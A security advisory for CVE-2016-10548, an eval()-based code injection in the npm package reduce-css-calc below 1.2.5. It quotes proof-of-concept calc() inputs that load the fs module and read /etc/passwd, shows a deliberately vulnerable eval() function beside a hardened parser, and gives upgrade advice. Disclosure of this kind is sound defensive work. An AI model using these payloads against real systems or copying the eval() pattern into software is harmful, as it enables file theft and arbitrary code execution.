Arbitrary Code Injection

Affecting reduce-css-calc package, versions <1.2.5


Overview

reduce-css-calc is a package that reduces CSS calc() expressions as far as possible. Affected versions of the package used eval() to evaluate the expression, allowing an attacker to gain arbitrary code execution via specially crafted input.

Example

The issue was reported by ChALkeR and demonstrated by his example below:

const reduceCSSCalc = require('reduce-css-calc');
console.log(reduceCSSCalc(`calc(                       (Buffer(10000)))`));
console.log(reduceCSSCalc(`calc(                       (global['fs'] = require('fs')))`));
console.log(reduceCSSCalc(`calc(                       (fs['readFileSync']("/etc/passwd", "utf-8")))`));
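The eval()-based pattern the advisory describes, next to a strict arithmetic evaluator that rejects the inputs shown above, as an added example (not the package's own code; the function names are hypothetical):

```javascript
// Added example, not reduce-css-calc's own code. Function names are hypothetical.

// Vulnerable pattern: passing the calc() body to eval() hands the input to
// the JavaScript engine, so any expression the engine accepts will run.
function unsafeReduceCalc(input) {
  const body = input.replace(/^calc\(/, '').replace(/\)$/, '');
  return eval(body); // arbitrary code execution on crafted input
}

// Hardened form: tokenize against a strict grammar (numbers, + - * /, and
// parentheses) and compute with a small recursive-descent parser. Anything
// outside the grammar (identifiers, quotes, brackets, calls) is rejected
// before any evaluation happens, so no interpreter ever sees it.
function safeReduceCalc(input) {
  const m = /^calc\(([\s\S]*)\)$/.exec(input.trim());
  if (!m) throw new Error('not a calc() expression');
  // Each non-whitespace character that is not a number or operator becomes its
  // own token and is rejected by factor() below.
  const tokens = m[1].match(/\d+(?:\.\d+)?|[-+*/()]|\S/g) || [];
  let pos = 0;
  const peek = () => tokens[pos];
  const next = () => tokens[pos++];
  function factor() {
    const t = next();
    if (t === '(') { const v = expr(); if (next() !== ')') throw new Error('missing )'); return v; }
    if (t === '-') return -factor();
    if (typeof t === 'string' && /^\d/.test(t)) return parseFloat(t);
    throw new Error(`rejected token: ${JSON.stringify(t)}`);
  }
  function term() {
    let v = factor();
    while (peek() === '*' || peek() === '/') { const op = next(); const r = factor(); v = op === '*' ? v * r : v / r; }
    return v;
  }
  function expr() {
    let v = term();
    while (peek() === '+' || peek() === '-') { const op = next(); const r = term(); v = op === '+' ? v + r : v - r; }
    return v;
  }
  const result = expr();
  if (pos !== tokens.length) throw new Error(`trailing input: ${tokens.slice(pos).join(' ')}`);
  return result;
}

module.exports = { unsafeReduceCalc, safeReduceCalc };
```

The evaluator deliberately ignores units; a production version would carry units through the arithmetic, but the rejection of non-arithmetic tokens is the part that closes the injection.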

Remediation

Upgrade reduce-css-calc to version 1.2.5 or greater.

CVSS Score

10.0 (high severity)
  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope: Changed
  • Confidentiality: High
  • Integrity: High
  • Availability: High
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Credit: Сковорода Никита Андреевич (ChALkeR)
CVE: CVE-2016-10548
CWE: CWE-94
Snyk ID: npm:reduce-css-calc:20160913
Disclosed: 20 Aug, 2016
Published: 17 Oct, 2016